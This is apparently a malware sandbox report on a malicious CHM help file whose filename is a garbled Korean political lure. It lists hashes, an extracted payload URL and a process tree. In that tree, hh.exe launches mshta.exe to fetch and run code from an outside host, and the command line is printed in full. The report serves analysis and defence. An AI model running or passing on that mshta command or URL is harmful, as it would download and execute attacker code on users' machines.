Analysis
-
max time kernel
146s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21-03-2023 23:17
Behavioral task
behavioral1
Sample
(20220120)2022 - 001.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
(20220120)2022 - 001.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).chm
Resource
win10v2004-20230221-en
Behavioral task
behavioral5
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
(์์) ์ 20๋ ๋ํต๋ น ์ทจ์์ ์ฌ์ธ๋ํฌ ์ฐธ์์ ์ถ์ฒ ๋ช ๋จ(๊ตญ๋ฏผ์ํ๋น์ 000).xls
Resource
win10v2004-20230220-en
General
-
Target
(20220120)2022 - 001.chm
-
Size
331KB
-
MD5
914521cb6b4846b2c0e85588d5224ba2
-
SHA1
9171d8b916637bd4b1b4348c1744d8f25a2363c6
-
SHA256
a88dc9a152cc7758a1df5aa33cf7b31cdb14e593a8744f2059602a49b8b04e0f
-
SHA512
cfc3f84a08213f8a1883f0ca6164067e4dfa59d8655e0c2f0fcba0bf985555bb0dca00b5eae0bfaa9ad6861736e9dfe57af490faeb53553d60c460a51d3233c8
-
SSDEEP
6144:tWVDblCou9OdcHSgSLaCjPjjaZL4annWryMGfdnSavw/5q/Rhc/UVkRJU1yq9i8y:uM3W0jSL3n4F5nlLW+ye/y
Malware Config
Extracted
http://attiferstudio.com/install.bak/sony/10.html
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 10 3620 mshta.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
hh.exepid process 3760 hh.exe 3760 hh.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
hh.exedescription pid process target process PID 3760 wrote to memory of 3620 3760 hh.exe mshta.exe PID 3760 wrote to memory of 3620 3760 hh.exe mshta.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\(20220120)2022 - 001.chm"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/10.html ,2⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3760-140-0x00000201AA970000-0x00000201AAE27000-memory.dmpFilesize
4.7MB